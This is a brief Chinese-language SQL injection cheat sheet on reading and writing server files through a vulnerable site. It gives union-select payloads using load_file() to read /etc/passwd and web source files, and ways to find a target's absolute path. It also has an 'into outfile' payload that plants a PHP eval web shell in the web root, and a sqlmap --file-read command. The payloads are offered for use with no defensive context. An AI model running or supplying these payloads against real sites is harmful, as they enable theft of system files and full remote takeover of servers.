系统固定文件路径:https://blog.csdn.net/ncafei/article/details/54616826
/etc/passwd
c:/windows/win.ini
文件读取使用load_file()函数:
使用之前我们需要先找到网站的绝对路径。(获取办法:报错显示、谷歌语法、site:目标网站 warning、遗留文件如phpinfo、漏洞爆出路径、读取配置文件)
注意路径符号:错误“\” 正确"\\" 正确"/"。如果将路径转换为16进制就可以不用引号。
union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3
文件写入使用into outfile函数:
union select 1,"<?php @eval($_GET[x]);?>",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'
sqlmap读取文件
--file-read用法用于读取本地文件
python sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd